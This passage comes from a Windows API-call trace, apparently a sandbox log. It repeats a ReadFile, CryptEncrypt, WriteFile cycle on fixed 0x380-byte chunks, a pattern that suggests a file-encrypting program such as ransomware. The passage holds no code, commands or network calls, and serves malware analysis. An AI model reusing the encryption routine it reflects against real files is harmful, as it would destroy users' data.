lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.185] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.185] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.186] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.186] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.187] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.187] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.188] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.188] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.189] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.189] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.190] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.191] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.191] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 